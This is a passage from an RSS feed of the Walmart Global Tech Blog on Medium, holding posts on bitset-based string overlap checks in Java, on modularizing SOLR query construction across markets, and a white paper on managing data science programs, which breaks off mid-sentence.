the next part!</em></strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=8b6a27a65023" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/from-single-instance-to-split-brain-a-database-scaling-journey-8b6a27a65023">From Single Instance to Split-Brain: A Database Scaling Journey</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[How Bitsets Supercharged Our Backend: Faster String Overlap Checks at Scale]]></title>
            <link>https://medium.com/walmartglobaltech/how-bitsets-supercharged-our-backend-faster-string-overlap-checks-at-scale-412911bfc3d5?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/412911bfc3d5</guid>
            <category><![CDATA[distributed-systems]]></category>
            <category><![CDATA[backend-development]]></category>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[performance-optimization]]></category>
            <dc:creator><![CDATA[Jiaqi Zhu]]></dc:creator>
            <pubDate>Wed, 25 Mar 2026 19:02:18 GMT</pubDate>
            <atom:updated>2026-03-25T19:02:17.299Z</atom:updated>
            <content:encoded><![CDATA[<h3>Introduction</h3><p>Ever wondered why your backend slows to a crawl when comparing massive sets of strings? Here’s how we turned a bottleneck into a lightning-fast operation using bitsets.</p><p>Efficiently checking for overlaps between large sets of strings is a common challenge in high-throughput backend services. Traditional approaches — such as nested loops or hash-based comparisons — can quickly become performance bottlenecks, especially as data volumes scale and both memory and response time are critical.</p><p>This is particularly true in environments like Walmart’s, where backend systems routinely process millions of records per second to power search, recommendation, and fraud detection features. As our applications grew, we observed that even well-optimized hash set operations struggled to keep up with the demands of real-time processing.</p><p>In this blog, I’ll share how we leveraged bitset optimization to transform our string set overlap checks.</p><h3>The Problem: When “Fast Enough” Isn’t Enough</h3><p>Our service is designed to handle high volumes of requests, each containing multiple sets of strings mapped to unique keys — such as user IDs, product SKUs, or transaction identifiers. For every incoming key, we must efficiently retrieve the corresponding set of strings from our backend database and determine if there is any overlap with the provided set in the request.</p><p>This overlap check is a critical step in workflows like deduplication, access control, and real-time validation. However, as the number of keys and the size of each string set grow, the computational and memory demands of these operations can escalate rapidly.</p><h3>The Memory Bottleneck</h3><p>To mitigate performance bottlenecks, we initially explored caching the database string sets locally within each pod. While this approach did improve lookup speed, it introduced a new challenge: memory consumption. As our dataset grew, the memory footprint of these in-memory caches ballooned, reaching an unsustainable level in the worst-case scenarios. This strained our infrastructure resources and increased the risk of out-of-memory errors.</p><h3>The Naive Approach</h3><p>Traditional approaches, such as iterating through sets or leveraging hash-based comparisons, often struggle to keep pace under heavy load.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/936/0*oz_XzKcrkmUlHnrO.png" /></figure><p>Each comparison required iterating through potentially thousands of strings, resulting in operations with time complexity proportional to the product of the set sizes. Under peak load, this led to noticeable spikes in response times. Even with optimized algorithms, the sheer scale of data made it difficult to achieve the low-latency guarantees required by our backend systems.</p><pre>// Traditional Hash-based approach<br>public boolean overlap(Set&lt;String&gt; setA, Set&lt;String&gt; setB) {<br>    // This often involves iterating over the smaller set <br>    // and checking for existence in the larger set.<br>    for (String s : setA) {<br>        if (setB.contains(s)) {<br>            return true;<br>        }<br>    }<br>    return false;<br>}</pre><p>While accurate, this approach struggles under heavy load: the time complexity is roughly proportional to the product of the set sizes (O(N * M), or O(N) in the best case with hash sets), which quickly becomes a nightmare at scale.</p><h3>Enter Bitsets: The “Secret Weapon”</h3><p>To address these challenges, we implemented a bitset-based optimization.</p><h3>How It Works</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/936/0*lbXSrxJcMlgPQi2E.png" /></figure><ol><li><strong>Unique String Mapping:</strong> Assign a unique integer index to every distinct string across all sets (e.g., “xxxxx” → 1).</li><li><strong>Bitset Representation:</strong> Represent each set of strings as a bitset, where the bit at position i is set to 1 if the string with index i is present in the set.</li></ol><pre>Universe: [&quot;apple&quot;, &quot;banana&quot;, &quot;carrot&quot;]<br>Index:    { &quot;apple&quot;: 0, &quot;banana&quot;: 1, &quot;carrot&quot;: 2 }</pre><pre>Set A: {&quot;apple&quot;, &quot;carrot&quot;}  -&gt; Bits: 1 0 1<br>Set B: {&quot;banana&quot;}           -&gt; Bits: 0 1 0<br>Set C: {&quot;apple&quot;}            -&gt; Bits: 1 0 0<br>// Set A and Set C intersect on &quot;apple&quot;</pre><h3>The Implementation</h3><p>Here is the core logic for converting strings to bitsets and checking for overlaps:</p><pre>import java.util.*;</pre><pre>public class BitSetStringOverlap {<br>    // Map each string in the universe to a unique bit position<br>    private static Map&lt;String, Integer&gt; buildUniverseIndex(List&lt;String&gt; universe) {<br>        Map&lt;String, Integer&gt; indexMap = new HashMap&lt;&gt;();<br>        for (int i = 0; i &lt; universe.size(); i++) {<br>            indexMap.put(universe.get(i), i);<br>        }<br>        return indexMap;<br>    }</pre><pre>    // Convert a set of strings to a BitSet<br>    private static BitSet stringsToBitSet(Set&lt;String&gt; strings, Map&lt;String, Integer&gt; universeIndex) {<br>        BitSet bitSet = new BitSet(universeIndex.size());<br>        for (String s : strings) {<br>            Integer idx = universeIndex.get(s);<br>            if (idx != null) {<br>                bitSet.set(idx);<br>            }<br>        }<br>        return bitSet;<br>    }</pre><pre>    // Check if two BitSets overlap<br>    private static boolean overlap(BitSet a, BitSet b) {<br>        BitSet clone = (BitSet) a.clone();<br>        clone.and(b);<br>        return !clone.isEmpty();<br>    }<br>}</pre>
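<p>For completeness, here is a small, self-contained usage sketch that ties the index and the overlap check together. It is illustrative only (the class and variable names are not from our codebase) and uses java.util.BitSet directly; intersects() is equivalent to the clone-and-AND check shown above.</p><pre>import java.util.*;<br><br>// Hypothetical demo, reusing the apple/banana/carrot universe from the example above<br>public class OverlapDemo {<br>    public static void main(String[] args) {<br>        List&lt;String&gt; universe = Arrays.asList(&quot;apple&quot;, &quot;banana&quot;, &quot;carrot&quot;);<br>        Map&lt;String, Integer&gt; index = new HashMap&lt;&gt;();<br>        for (int i = 0; i &lt; universe.size(); i++) {<br>            index.put(universe.get(i), i);<br>        }<br><br>        BitSet setA = new BitSet(universe.size());   // {&quot;apple&quot;, &quot;carrot&quot;} -&gt; 1 0 1<br>        setA.set(index.get(&quot;apple&quot;));<br>        setA.set(index.get(&quot;carrot&quot;));<br><br>        BitSet setC = new BitSet(universe.size());   // {&quot;apple&quot;} -&gt; 1 0 0<br>        setC.set(index.get(&quot;apple&quot;));<br><br>        // One bitwise check replaces the element-by-element comparison<br>        System.out.println(setA.intersects(setC));   // prints true: both contain &quot;apple&quot;<br>    }<br>}</pre>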
<p>With bitsets, overlap checks are reduced to a single bitwise AND operation. If the result is non-zero, an overlap exists. This approach is orders of magnitude faster than traditional set intersection algorithms.</p><h3>Architecture: Decoupling for Speed</h3><p>We didn’t just change the code; we changed the architecture to decouple latency-sensitive operations from heavy string processing.</p><ul><li>Centralized Index: We maintain a consistent mapping between each unique string and its corresponding bit position, stored centrally in a SQL database.</li><li>Offline Storage: We shifted from storing raw string arrays in the database to storing their compact bitset representations. When a new string set is persisted, we encode it as a bitset immediately.</li><li>On-the-fly Processing: For incoming requests, we apply the same index mapping on-the-fly, converting the provided string sets into bitsets in real time.</li></ul><h3>The Impact: Crunching the Numbers</h3><p>Switching to bitsets delivered tangible benefits to our backend systems. 
The contrast between the old approach and the new bitset optimization is stark:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rDAmTiUSckT0Lhhf5oILVA.png" /></figure><h4>In our application we observe following optimization</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*grK0zvQmNuNtUmzlm3RQXQ.png" /></figure><p>We drastically reduced the memory footprint required for both caching and storage, preventing the “Ouch!” moments of hitting memory limits.</p><h3>Practical Considerations</h3><p>While bitsets are powerful, there are a few things to keep in mind when implementing them:</p><ul><li>The Universe Index: You need a consistent “universe” of strings. We maintain a centralized index mapping in a SQL database to ensure all services speak the same “bit language”.</li><li>Decoupling: This architecture allows us to decouple latency-sensitive operations. Heavy string processing is done offline, while the live request path only handles fast bitwise math.</li><li>When NOT to use: If your universe of strings is infinitely growing with no central management, or if the sets are extremely sparse over a massive range without compression, standard bitsets might need tuning (like Roaring Bitmaps) to remain efficient.</li></ul><h3>Conclusion</h3><p>By transforming string set overlap checks into bitset operations, we achieved substantial improvements in both performance and resource utilization. This strategy is particularly effective for large-scale, high-frequency set operations typical in distributed systems like ours.</p><p>If you’re building high-throughput systems and struggling with memory or latency during set comparisons, bitsets might just be your secret weapon.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=412911bfc3d5" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/how-bitsets-supercharged-our-backend-faster-string-overlap-checks-at-scale-412911bfc3d5">How Bitsets Supercharged Our Backend: Faster String Overlap Checks at Scale</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Modularizing SOLR Query Creation for Multi-Market Scale]]></title>
            <link>https://medium.com/walmartglobaltech/modularizing-solr-query-creation-for-multi-market-scale-a1f34e28b631?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/a1f34e28b631</guid>
            <category><![CDATA[monolithic-architecture]]></category>
            <category><![CDATA[software-architecture]]></category>
            <category><![CDATA[information-retrieval]]></category>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[modular-monolith]]></category>
            <dc:creator><![CDATA[Naman Parikh]]></dc:creator>
            <pubDate>Tue, 03 Mar 2026 12:18:55 GMT</pubDate>
            <atom:updated>2026-03-03T12:18:54.547Z</atom:updated>
            <content:encoded><![CDATA[<h3><strong>Introduction</strong></h3><p>When the SOLR query logic expanded into a 12,000-line monolithic implementation, each modification introduced significant risk, making every change feel akin to defusing a critical system. Adding a market-specific override required yet another if block, compounding complexity and slowing time-to-market. In this article, we will deep dive into how we broke up that SOLR query creation logic, enabling clean per-market configuration, stronger typing, reduced technical debt and dramatically fewer runtime errors.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/904/1*up02Of4XYIr14OKR-ifRJw.png" /><figcaption>Image generated with DALL·E via ChatGPT</figcaption></figure><h3>The Problem: When SOLR Query Creation Logic Becomes Technical Debt</h3><p>The SOLR query logic class handled filtering logic, boosting logic, boost functions, pagination, etc. All the parameters of the SOLR query were generated by this single class. Over time, this core class accumulated logic for different types of queries:</p><ul><li>Primary search queries</li><li>Item insertions via business tools</li><li>Item insertions via semantic sources</li></ul><p>Thousands of lines tangled edge-case handling, scoring tweaks, and boosting logic. This unscalable approach:</p><p>Blocked rapid iteration for new markets</p><ul><li>Tight Coupling: All query-handling logic lived in one massive class, making it difficult to cleanly separate concerns. Market-specific changes could unintentionally affect unrelated logic, requiring exhaustive regression testing.</li><li>High Risk of Unintended Consequences: Changing business requirements (such as supporting different filtering or boosting strategies for a new market) entailed changing existing code that already served other markets. Developers had to be extremely cautious, as a bug or oversight could break unrelated functionality.</li><li>No Configuration Flexibility: There was no clear system for externalizing market-specific configuration. Instead, all logic changes happened directly in code, preventing business users or product managers from making simple market changes without developer intervention.</li></ul><p>Increased runtime exceptions</p><ul><li>Lack of strong typing: In the monolith implementation, parameters for various queries (filter, boost, facet, etc.) were often handled as generic objects, maps, or loosely typed structures. Whenever code tried to cast a parameter to the expected type without proper validation, a ClassCastException or NullPointerException would occur if the object was missing or of the wrong type.</li></ul><p>Made testing and debugging painful</p><ul><li>No isolation: With all logic in one class, you couldn’t test a single part (e.g., boost setup or filter logic) in isolation. Every change risked breaking other unrelated query paths.</li><li>Opaque Error Sources: When a test failed or an exception was thrown, the error stack trace typically pointed to a dense method with dozens of responsibilities. 
Tracing the root cause involved manually reviewing many conditionals and nested logic blocks.</li><li>Manual validation required: Since types weren’t enforced, developers had to write extra validation code or rely heavily on manual testing, which is error-prone and slow.</li></ul><h3>Motivation for a Modular Architecture</h3><p>The monolithic SOLR query logic introduced multiple pain points: tight coupling that made changes risky, lack of configuration flexibility forcing code edits for market-specific needs, runtime exceptions due to weak typing, and opaque error sources that slowed debugging. These issues made it difficult to scale across markets, slowed down development, and increased the risk of unintended consequences.</p><p>To overcome these challenges, we needed a new approach — one that would allow us to separate concerns, improve testability, and support market-specific configurations without duplicating logic. This led us to adopt a <strong>modular architecture</strong> for SOLR query creation.</p><p>To bring order to chaos, we defined a few clear goals:</p><ul><li><strong>Modularize query creation</strong> to separate concerns and make the system testable and extendable.</li><li><strong>Support multiple markets</strong> from a single codebase, without duplicating or entangling logic.</li><li><strong>Reduce technical debt</strong> by identifying and removing outdated code paths and unused toggles.</li><li><strong>Single responsibility principle </strong>to be used to create a single module responsible for Retrieval. This is needed to separate it out from other core pieces of Search like Query Understanding, Ranking.</li><li><strong>Ease out feature development </strong>by reducing the number of files to be changed to rollout a feature. This is needed to reduce development time, testing time and release feature with a greater amount of confidence</li><li><strong>Strongly typed parameters</strong> to eliminate runtime casting errors</li><li><strong>Testability</strong> through small, focused classes</li></ul><h3>Solution Overview</h3><p>At the heart of this new design was a simple idea: treat the SOLR query as a POJO (Plain Old Java Object). Additionally, there are few other components:</p><ol><li>SOLR Query</li><li>Query Param Creator</li><li>Query Param Module</li><li>Query Assembler</li><li>Query Override Handler</li></ol><p><strong>Illustrative Example: Modular Query for a Bookstore Search</strong></p><p>Imagine you’re building a search system for an online bookstore. 
A user might search for “science fiction books under $20.” Here’s how modular query creation would work:</p><p>Solr Query POJO would have these objects:</p><ul><li><strong>FilterQueryParam</strong>: Filters by genre = “Science Fiction” and price &lt; $20</li><li><strong>BoostQueryParam</strong>: Boosts books with high ratings or recent publications</li><li><strong>FacetQueryParam</strong>: Adds facets for author, publisher, and publication year</li><li><strong>SortQueryParam</strong>: Sorts results by relevance or price</li><li><strong>FieldListParam</strong>: Specifies which fields (title, author, price) to return</li></ul><p>Each of these parameters is created by its own <strong>QueryParamCreator</strong>, wrapped in a <strong>QueryParamModule</strong>, and assembled into a final <strong>SolrQuery</strong> using the <strong>QueryAssembler</strong>.</p><p>This modular approach allows you to plug in different logic for different use cases — say, searching vs inserting new books — without touching the core query-building logic.</p><p>1. SOLR Query</p><p>We introduced a central SOLR Query that represents the full query. This object is composed of smaller param objects like:</p><ul><li>FilterQueryParam</li><li>BoostQueryParam</li><li>FacetQueryParam</li><li>…</li></ul><p>Below is an illustrative diagram:</p><p><strong>Before:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/694/1*JWtoOjwDjL5E7G5UUpx3qg.png" /></figure><pre>Map&lt;String, Object&gt; solrQueryParamsMap = new HashMap&lt;&gt;();<br>solrQueryParamsMap.put(&quot;fq&quot;, Arrays.asList(&quot;&quot;));<br>solrQueryParamsMap.put(&quot;bq&quot;, Arrays.asList(&quot;&quot;));<br>solrQueryParamsMap.put(&quot;facet.query&quot;, &quot;&quot;);<br>solrQueryParamsMap.put(&quot;sort&quot;, &quot;asc&quot;);<br>solrQueryParamsMap.put(&quot;sort.field&quot;, Arrays.asList(&quot;&quot;));</pre><p><strong>After:</strong></p><pre>public class SolrQuery {<br>  private FilterQueryParam filterQueryParam;<br>  private BoostQueryParam boostQueryParam;<br>  private FacetQueryParam facetQueryParam;<br>  private SortQueryParam sortQueryParam;<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/902/1*35KSDHLROKofosrFZyVbOA.png" /></figure><p>2. Query Param Creator</p><p>Each of these POJOs maps <strong>1:1 to a Query Creator</strong> interface.</p><pre>public interface SolrParamCreator&lt;T extends AbstractSolrParam&gt; {<br> T create(BaseRequest r);<br>}<br><br>public class FilterQueryParamCreator implements SolrParamCreator&lt;FilterQueryParam&gt; {<br> public FilterQueryParam create(BaseRequest r);<br>}</pre><p>Each creator has <strong>multiple implementations</strong>, allowing us to plug in logic based on:</p><ul><li>Use case (search vs insertion)</li><li>Features</li><li>Experiments or business overrides</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UeTZAqwXe01iAboGhetukA.png" /><figcaption>Query Param Creator Diagram</figcaption></figure><p>3. Query Param Module</p><p>A Query Param Module encompasses a Creator and its corresponding Query Param.</p><pre>public interface QueryParamModule&lt;R&gt; {<br> void apply(SolrQuery solrQuery, BaseRequest r);<br>}<br><br>public class FilterModule implements QueryParamModule&lt;BaseRequest&gt; {<br> private final FilterQueryParamCreator creator;<br><br> public void apply(SolrQuery q, BaseRequest r) {<br>  q.setFilterQueryParam(creator.create(r));<br> }<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wIKWc0hQDhyrpd90AG-4bA.png" /><figcaption>Query Param Module Diagram</figcaption></figure><p>4. Query Assembler</p><p>The idea is to:</p><ul><li>Define a common interface</li><li>Wrap each creator and setter in a module</li><li>In the assembler, keep a list of modules and loop through them.</li></ul><p>This gives us the benefits of:</p><ul><li><strong>Open/closed</strong>: Add new query-param modules without touching existing code.</li><li><strong>Single loop</strong>: All setters run in one loop in the assembler.</li><li><strong>Testable units</strong>: Each module can be unit-tested in isolation.</li></ul><pre>public class QueryAssembler {<br>   private final List&lt;QueryParamModule&lt;BaseRequest&gt;&gt; modules;<br> <br>   public SolrQuery assemble(BaseRequest request) {<br>       SolrQuery solrQuery = new SolrQuery();<br>       for (QueryParamModule&lt;BaseRequest&gt; module: modules) {<br>           module.apply(solrQuery, request);<br>       }<br>       return solrQuery;<br>   }<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/628/1*oo7WV3DJNnIp7FYDFXKetA.png" /></figure><p>5. Query Override Handler</p><p>The Query Override Handler is used to override the SOLR query object by applying business rules on top of the usual execution.</p><pre>public interface SolrQueryOverrideHandler {<br>    void override(BaseRequest r, SolrQuery solrQuery);<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/574/1*9H6xcUmd5dBWSFAjRG-RYQ.png" /><figcaption>Solr Query Override Handler Diagram</figcaption></figure>
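<p>As a concrete (and purely illustrative) sketch of how an override handler and a per-market feature flag fit together, consider the hypothetical handler below. BaseRequest.getMarket(), the FeatureFlags interface, the market code and the flag name are assumptions for this example and not part of our codebase; the creator, param and override interfaces are the ones introduced above.</p><pre>// Illustrative per-market flag lookup (hypothetical, not from our codebase)<br>public interface FeatureFlags {<br> boolean isEnabled(String flagName, String market);<br>}<br><br>// Hypothetical override: replace the assembled filter for one market, only when the flag is on<br>public class MarketFilterOverrideHandler implements SolrQueryOverrideHandler {<br> private final FilterQueryParamCreator marketSpecificFilterCreator;<br> private final FeatureFlags flags;<br><br> public void override(BaseRequest r, SolrQuery solrQuery) {<br>  // getMarket() and the &quot;MX&quot; market code are assumed for illustration<br>  if (&quot;MX&quot;.equals(r.getMarket()) &amp;&amp; flags.isEnabled(&quot;mx.market-filter&quot;, r.getMarket())) {<br>   solrQuery.setFilterQueryParam(marketSpecificFilterCreator.create(r));<br>  }<br> }<br>}</pre><p>Because the handler only touches the strongly typed FilterQueryParam on the SolrQuery POJO, turning the flag off (or simply not registering the handler for other markets) leaves the assembled query untouched.</p>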
<p>In addition to these components, we ensured that every deeply nested piece of core logic is behind a feature flag that can be configured for each market to quickly enable or disable a feature.</p><h3>Migration Strategy</h3><ol><li><strong>Phase 1</strong>: Wrap the existing class in a facade calling the new creators.</li><li><strong>Phase 2</strong>: Gradually redirect code paths to the QueryAssembler.</li><li><strong>Phase 3</strong>: Remove the legacy monolith class after coverage and stability targets are met.</li></ol><p>All changes were backed by unit and integration tests configured via CI pipelines.</p><h3>Results &amp; Metrics</h3><ul><li><strong>Query development time</strong> for new markets reduced from 3 days to 3 hours</li><li><strong>Feature sharing</strong> is possible between markets with a config change</li><li><strong>Around 100 unused legacy features</strong> were deprecated</li><li><strong>NullPointer &amp; ClassCast exceptions</strong> dropped by 95%</li><li><strong>Code complexity</strong> (Cyclomatic) decreased by 40%</li></ul><h3>Lessons Learned</h3><ul><li><strong>Strong typing</strong> prevents more bugs upstream than exhaustive tests.</li><li><strong>Configuration-driven overrides</strong> keep code clean and markets flexible.</li><li><strong>Diagram early</strong>: Sharing architecture visuals aligned team understanding.</li></ul><h3>Conclusion &amp; Actionable Takeaways</h3><p>By modularizing SOLR query creation, you can rapidly onboard new markets, reduce bugs, and improve developer productivity. Key steps to apply:</p><ol><li>Define clear parameter objects.</li><li>Encapsulate cross-cutting logic in focused creators.</li><li>Use a single assembler facade.</li><li>Migrate incrementally, with tests guarding each stage.</li></ol><p>Ready to break your own monolith? 
Start by identifying your first module boundary and sketching the data flow!</p><p>#Engineering #SoftwareArchitecture #ModularMonolith #MonolithicArchitecture #SoftwareDevelopment #Retrieval #Solr</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a1f34e28b631" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/modularizing-solr-query-creation-for-multi-market-scale-a1f34e28b631">Modularizing SOLR Query Creation for Multi-Market Scale</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[White Paper on Data Science Technical Program Management]]></title>
            <link>https://medium.com/walmartglobaltech/white-paper-on-data-science-technical-program-management-08dc2535bd1a?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/08dc2535bd1a</guid>
            <category><![CDATA[technical-program-manager]]></category>
            <category><![CDATA[leadership]]></category>
            <category><![CDATA[data-science]]></category>
            <category><![CDATA[machine-learning]]></category>
            <category><![CDATA[software-engineering]]></category>
            <dc:creator><![CDATA[Sonu Jain]]></dc:creator>
            <pubDate>Fri, 27 Feb 2026 12:41:46 GMT</pubDate>
            <atom:updated>2026-02-27T12:41:45.314Z</atom:updated>
            <content:encoded><![CDATA[<p><strong>1.</strong> <strong>Abstract</strong></p><p>Managing Data Science programs requires a structured approach to handle the complexities of data, model development, and business alignment. This whitepaper provides a comprehensive guide on the effective program management of Data Science programs by technical program managers. It highlights the critical role of Technical Program Managers (TPMs) in driving successful execution and outlines the key phases, challenges, and recommended best practices at every stage for effectively managing Data Science programs</p><p>This white paper is grounded in a real-world inventory forecasting initiative aimed at improving stock availability and reducing overstock across multiple retail categories. The program involved cross-functional collaboration between Data Science, Engineering, Product, and Business teams to build predictive models that could dynamically adjust inventory levels based on demand signals.</p><p><strong>2.</strong> <strong>Introduction</strong></p><p>Data Science has become a critical pillar of decision-making across industries, but organizations continue to struggle with operationalizing these initiatives. Unlike software development, which follows predictable sprint cycles, Data Science programs are inherently experimental — requiring repeated cycles of data validation, model training, and retraining before they reach acceptable performance levels. This uncertainty often leads to misaligned expectations, delays in delivery, and inconsistent business impact.</p><p>The iterative nature of model development makes predictability especially challenging: teams may require multiple iterations to achieve coverage and accuracy thresholds that satisfy business needs. Without structured program management, these efforts risk becoming siloed experiments rather than scalable, value-generating solutions.</p><p>This whitepaper aims to address this gap by providing a practical framework for Technical Program Managers (TPMs) to manage Data Science programs effectively. It draws on real-world experience from a large-scale inventory forecasting initiative to illustrate how TPM-led governance, alignment, and phased execution can bring discipline and predictability to an otherwise experimental process.</p><p><strong>3.</strong> <strong>Methodology</strong></p><p>Managing a Data Science program requires more than adopting standard Agile rituals or deploying models on cloud platforms. The critical differentiator lies in <strong>adapting these methods to the inherently experimental nature of Data Science.</strong></p><p>Our approach began with a deep dive into the <strong>business context</strong> — identifying objectives like minimizing stockouts, optimizing inventory turnover, and improving forecast accuracy. From there, we established a <strong>cross-functional operating model</strong>, ensuring early alignment between Data Scientists, Engineers, Analysts, and Business stakeholders. This upfront alignment reduced rework and prevented scope creep once modelling iterations began.</p><p>To introduce predictability into what is often a non-linear process, we designed a <strong>custom governance framework</strong>. Sprint cycles were defined not just for coding, but for each stage of the Data Science lifecycle: requirements (BRD to PRD), data collection, feature engineering, model training, validation, and deployment. 
Each stage had <strong>gated progression</strong>, reviewed jointly by technical and business owners, ensuring that models advanced only when quality and coverage thresholds were met.</p><p>Tools like Jira, CI/CD pipelines, and cloud platforms (AWS/GCP/Azure) were not used “off the shelf,” but <strong>tailored to Data Science needs</strong>. For example, Jira workflows were restructured to mirror the DS lifecycle, complete with dashboards that tracked experiment status, model readiness, and business validation. CI/CD pipelines were extended to handle <strong>model versioning and automated retraining triggers</strong>, while cloud resources were provisioned at kick-off to avoid compute bottlenecks during large-scale back testing.</p><p>This tailored methodology allowed us to maintain <strong>scientific rigor in experimentation</strong> while still providing <strong>program-level visibility and predictability</strong> — a balance that is often missing in Data Science initiatives.</p><p><strong>4.</strong> <strong>Data Science Delivery Lifecycle: Challenges and TPM Playbook</strong></p><p>Managing data science programs is not just about tracking experiments or collecting metrics. It’s about navigating unknowns, connecting fragmented teams, and unlocking value in a highly iterative environment. While we describe the lifecycle in distinct phases for clarity, the reality is more dynamic: discoveries in later stages often require revisiting earlier steps — such as refining success metrics after validation insights or adjusting data sourcing based on modelling outcomes. This flexibility is intentional and built into the framework, ensuring that the process remains adaptive and responsive to new learnings. Let me brief how as TPM we systematically tackled risks of a real replenishment/Dynamic Inventory, forecasting initiatives across key phases of product lifecycle.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/904/1*EbHg4K_yM0oViBC4mdwXCw.png" /></figure><p><strong>Phase 1: Business Understanding</strong></p><p>The priority was to ensure the program was tied to business outcomes, with a clear measure of success.</p><p>For demand forecasting, this meant predicting demand at a geo level with higher accuracy than existing models — directly influencing inventory planning and working capital. Forecast inaccuracies have a tangible dollar impact on the business — under‑forecasting leads to lost revenue from stock‑outs, while over‑forecasting increases inventory carrying costs and potential disposition losses. Success was therefore measured using Mean Absolute Percentage Error (MAPE), with accuracy improvements explicitly mapped to reduced business loss, lower excess inventory, and improved working capital efficiency.</p><p><strong>Challenge — Balancing Speed and Accuracy</strong></p><p>Data Science timelines are inherently iterative, while Engineering works in structured sprints. This mismatch often led to tentative ETAs, multiple revisions, and misaligned expectations. In the initial forecasting use case, model outputs required several iterations to reach accuracy targets, causing uncertainty in downstream engineering integration.</p><p><strong>TPM Intervention</strong></p><p>To bridge the gap between business expectations and data science experimentation, the TPM established a unified success measurement framework at program initiation. 
The goal was to define clear metrics outlining how business impact would be measured, tracked, and reviewed throughout the lifecycle.</p><p>All teams — Data Science, Product, and Business — aligned on baseline accuracy benchmarks and target improvement thresholds before modelling began. Milestone-based checkpoints linked performance metrics such as MAPE to tangible business outcomes like reduced forecast error and optimized inventory levels. A structured review cadence focused discussions on business value realization rather than technical progress alone.</p><p>By institutionalizing success measurement early, the TPM ensured transparency, strengthened stakeholder alignment, and enabled data-driven trade-offs between experimentation time and business value, anchoring technical progress to strategic objectives.</p><p>Additionally, various approaches were planned upfront with business collaboration starting with coverage and adoption, then moving to accuracy so delivery could follow an iterative fashion, building confidence at each milestone. This gave the business confidence that delivery was planned and predictable, not left to chance.</p><p><strong>Key Takeaway</strong></p><p>The Business Understanding Phase should define a <strong>clear measure of success</strong>. This will be the anchor in subsequent stages and will help in reducing uncertainty.</p><p><strong>Phase 2: Data Sourcing and Transformation</strong></p><p>This phase focused on identifying the right data sources, validating their reliability, correctness and completeness, and ensuring they could be transformed into scalable, compliant pipelines.</p><p><strong>Challenges — Data Quality Uncertainty</strong></p><p>Inaccurate or incomplete data reduced signal strength and model reliability. For example, customer address data was missing in some upstream systems, while sales data arrived in a different time zone than address data — leading to misalignment in outputs.</p><p>Schema Ambiguity: Schema documentation was often missing or incomplete. Similar-sounding fields (e.g., customer_id vs cust_id) could represent different entities, creating confusion and risk during feature engineering.</p><p>Data Duplication: Same data appeared in multiple sources with inconsistencies, making it hard to determine the source of truth and ensure consistency.</p><p><strong>TPM Intervention</strong></p><p>The TPM brought together Data Science, Engineering, and Product in a workshop to co-create a workaround: returning customers were aggregated via customer ID, while new customers were mapped to the highest-sales zip. A specific data quality Data Quality Score (DQS) was introduced. This was based on completeness, consistency, and timeliness, with a minimum threshold of 95% completeness and &lt;2% time zone mismatch tolerance before data was accepted for modelling. With QA coverage and team signoffs, this became a repeatable solution, enabling retraining on enriched data and reducing business impact.</p><p><strong>Schema Contracts:</strong> Introduced upfront schema definition and approval process involving <strong>Data Engineering, Data Science, and Product teams </strong>to reduce ambiguity.</p><p><strong>Deduplication Checklist: </strong>Established a rule that Data Science teams only use Engineering-provided data/data sources as the source of truth.</p><p><strong>Key Takeaway</strong></p><p>Anticipate and resolve data quality gaps using guardrails and thresholds. 
Introduce specific <strong>Data Quality metrics</strong> (e.g., completeness, consistency, timeliness) to measure and enforce standards. Address schema ambiguity and duplication early through <strong>schema contracts</strong> and <strong>source-of-truth policies</strong> before modelling begins.</p><p><strong>Phase 3: Modelling</strong></p><p>This phase focused on building scalable data science models while balancing exploration with predictable delivery. The team defined baselines, ran systematic experiments, and optimized for both accuracy and infrastructure cost.</p><p><strong>The modelling framework has the following dimensions of experimentation</strong></p><p><strong>Multiple Model frameworks:</strong> Multiple families of models are evaluated in parallel. Examples: statistical baselines such as Autoregressive Integrated Moving Average/ Error Trend Seasonality model [ARIMA/ETS], tree-based approaches such as XGBoost/LightGBM, and deep learning architectures like Multi-Horizon Recurrent Neural Networks [MHRNNs].</p><p><strong>Multi-horizon forecasting:</strong> Multiple horizons of forecasting are addressed simultaneously: Short-term (1–4 weeks), medium-term (5–12 weeks), and long-term (13+ weeks) horizons.</p><p><strong>Multiple sources of external inputs:</strong> Models trained on Uber H3 Level 7 hexagonal clusters, external market research data inputs.</p><p><strong>Multiple Learning mechanisms:</strong> Sequential learning to capture temporal dependencies, seasonality &amp; trend modelling, and integration of external factors such as promotions, weather, and macroeconomic 